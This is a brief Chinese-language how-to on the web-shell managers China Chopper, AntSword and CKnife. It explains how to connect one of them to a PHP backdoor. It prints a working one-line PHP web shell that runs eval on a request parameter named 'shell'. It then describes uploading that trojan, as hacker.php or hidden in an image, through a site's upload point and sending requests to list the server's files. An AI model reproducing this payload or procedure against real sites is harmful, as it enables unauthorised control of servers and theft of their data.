@扫描类工具:中国菜刀、蚁剑、CKnife(C刀)
@中国菜刀使用方法:
右键添加,将(php)文件的uel输入,如http://localhost/a.php ,该文件必须含有一句话木马;然后在url右边小框填上连接密码(即一句话木马的变量名,本例随意取名为shell);选择好相应语言等,最后双击/右键 查看文件目录结构
@eval($_REQUEST["shell"]);
@中国菜刀原理:
找到上传口(传文件/包含木马php文件的图片等),将一句话木马hacker.php文件传到服务器,然后通过 get/post上传值到hacker.php中我们定义的参数中,如_DIR_或_FILE_这种,php中查看文件目录的魔术常量等;根据php语法,会返回文件目录结构等信息
